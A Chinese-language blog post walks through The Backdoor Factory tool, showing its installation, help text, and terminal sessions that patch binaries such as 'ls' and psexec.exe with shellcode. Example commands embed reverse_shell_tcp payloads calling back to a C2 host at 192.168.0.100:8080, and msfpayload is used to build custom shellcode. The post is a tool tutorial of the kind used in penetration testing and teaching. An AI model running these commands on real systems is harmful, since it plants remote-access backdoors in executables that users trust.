- 浏览: 278639 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
参考:https://github.com/secretsquirrel/the-backdoor-factory
貌似很有趣,值得深入了解了解
安装过程
支持格式:
使用
例子:
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
Checking file support
System Type Supported: System V
Gathering file info
Getting shellcode length
The following LinuxIntelELF32s are available:
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
Checking file support
System Type Supported: System V
Gathering file info
Getting shellcode length
Must provide port
Setting selected shellcode
Must provide port
Patching x86 Binary
[!] Patching Complete
File ls is in the 'backdoored' directory
貌似很有趣,值得深入了解了解
安装过程
1. easy_install wget "https://pypi.python.org/packages/source/e/ez_setup/ez_setup-0.9.tar.gz#md5=1ac53445a67bf68eb2676a72cc3f87f8" -O easy.tar.gz tar vxf easy.tar.gz cd ez_setup-0.9/ python ez_setup.py 2. 安装pip wget 'https://pypi.python.org/packages/source/p/pip/pip-1.5.6.tar.gz#md5=01026f87978932060cc86c1dc527903e' -O pip.tar.gz tar vxf pip.tar.gz python setup.py install 3. 安装the-backdoor-factory wget https://github.com/secretsquirrel/the-backdoor-factory/archive/master.zip unzip master.zip cd the-backdoor-factory-master/ ./install.sh
支持格式:
引用
Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32
and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32
使用
root@kali:~/the-backdoor-factory-master# ./backdoor.py -h Usage: backdoor.py [options] Options: -h, --help show this help message and exit -f FILE, --file=FILE File to backdoor -s SHELL, --shell=SHELL Payloads that are available for use. Use 'show' to see payloads. -H HOST, --hostip=HOST IP of the C2 for reverse connections. -P PORT, --port=PORT The port to either connect back to for reverse shells or to listen on for bind shells -J, --cave_jumping Select this options if you want to use code cave jumping to further hide your shellcode in the binary. -a, --add_new_section Mandating that a new section be added to the exe (better success) but less av avoidance -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE User supplied shellcode, make sure that it matches the architecture that you are targeting. -c, --cave The cave flag will find code caves that can be used for stashing shellcode. This will print to all the code caves of a specific size.The -l flag can be use with this setting. -l SHELL_LEN, --shell_length=SHELL_LEN For use with -c to help find code caves of different sizes -o OUTPUT, --output-file=OUTPUT The backdoor output file -n NSECTION, --section=NSECTION New section name must be less than seven characters -d DIR, --directory=DIR This is the location of the files that you want to backdoor. You can make a directory of file backdooring faster by forcing the attaching of a codecave to the exe by using the -a setting. -w, --change_access This flag changes the section that houses the codecave to RWE. Sometimes this is necessary. Enabled by default. If disabled, the backdoor may fail. -i, --injector This command turns the backdoor factory in a hunt and shellcode inject type of mechinism. Edit the target settings in the injector module. -u SUFFIX, --suffix=SUFFIX For use with injector, places a suffix on the original file for easy recovery -D, --delete_original For use with injector module. This command deletes the original file. Not for use in production systems. *Author not responsible for stupid uses.* -O DISK_OFFSET, --disk_offset=DISK_OFFSET Starting point on disk offset, in bytes. Some authors want to obfuscate their on disk offset to avoid reverse engineering, if you find one of those files use this flag, after you find the offset. -S, --support_check To determine if the file is supported by BDF prior to backdooring the file. For use by itself or with verbose. This check happens automatically if the backdooring is attempted. -M, --cave-miner Future use, to help determine smallest shellcode possible in a PE file -q, --no_banner Kills the banner. -v, --verbose For debug information output. -T IMAGE_TYPE, --image-type=IMAGE_TYPE ALL, x86, or x64 type binaries only. Default=ALL -Z, --zero_cert Allows for the overwriting of the pointer to the PE certificate table effectively removing the certificate from the binary for all intents and purposes. -R, --runas_admin Checks the PE binaries for 'requestedExecutionLevel level="highestAvailable"'. If this string is included in the binary, it must run as system/admin. Doing this slows patching speed significantly. -L, --patch_dll Use this setting if you DON'T want to patch DLLs. Patches by default. -F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY For MACH-O format. If fat file, focus on which arch to patch. Default is x64. To force x86 use -F x86, to force both archs use -F ALL.
例子:
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a
./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
msfpayload windows/exec CMD='calc.exe' R > calc.bin ./backdoor.py -f ls -s user_supplied_shellcode -U calc.bin root@kali:~/the-backdoor-factory-master# ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow
引用
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell
引用
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
File ls is in the 'backdoored' directory
发表评论
-
[图] windows 10
2015-08-18 20:37 284网上下载的图片,忘了来源 -
[转]Tunneling Data and Commands Over DNS to Bypass Firewalls
2015-07-13 20:44 459https://zeltser.com/c2-dns-tunn ... -
windows提权集合
2015-06-30 00:23 541https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 508原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1474原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 448引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 753原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 384原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 473原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2821原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 301原文地址:http://blog.gdssecurity.co ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1019参考:http://www.david-guembel.de/ ... -
window增加硬盘性能方法
2015-02-05 01:03 337参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 770原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 846https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 915原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1518下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1005原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3739原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ...
相关推荐
工具介绍-the-backdoor-factory(第九课).docx
simple-py-backdoor-master.rar
内含MITMf.zip BDFProxy.zip LANs.py the-backdoor-factory.zip DHCPShock-master.zip Available plugins ================= - ```SMBtrap``` - Exploits the 'SMB Trap' vulnerability on connected clients - ```...
The Backdoor Factory是一款安全测试工具,可以轻松的生成win32PE后门测试程序,ELF文件后门程序等。本工具仅用于安全实验和信息安全实验教学使用,禁止任何非法用途!
phpstudy PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
国外安全研究员在2014年8月发出的一篇关于Absolute公司的防盗追踪软件存在安全风险的技术分析文章。
phpstudy:PHPStudy_BackDoor_EXP PHPstudy后门利用脚本.zip
PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
是一款从CAD运行界面中抓图的绝佳软件,可以设置线宽、颜色、背景色等。
phpstudy
Eset公司2017年发布的Turla间谍组织第二阶段后门的报告,多年来一直以各种机构为目标。 最近,我们在Turla集团军火库中发现了几个新版本的Carbon,这是第二阶段的后门。这篇文章重点介绍了我们在carbon后门最新版本...
余烬后门Ember 应用程序的后门
带HTTP后门的gRPC服务器一个使用gRPC服务的HTTP后门的gRPC服务器实现示例。
title={Input-Aware Dynamic Backdoor Attack}, author={Nguyen, Anh and Tran, Anh}, booktitle={Proceedings of Advances in Neural Information Processing Systems}, year={2020} } 要求 安装所需的python...
root@kali:~/backdoor# apxs -i -a -c mod_backdoor.c && service apache2 restart /usr/share/apr-1.0/build/libtool --mode=compile --tag=disable-static x86_64-linux-gnu-gcc -prefer-pic -pipe -g -O2 -...
wget https://raw.githubusercontent.com/raincoats/osx-ping-backdoor/master/ping.c gcc ping.c -o ping chown root:wheel ./ping; chmod 4755 ./ping 或者, mv /sbin/ping{,-backup} && mv ./
msfvenom-backdoor-android 此Android Studio项目包含由生成的后门.apk的源代码 $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk (在Kali Linux套件中) 有关渗透...
wp-gateway-anti-malware-sets-bar
大马文件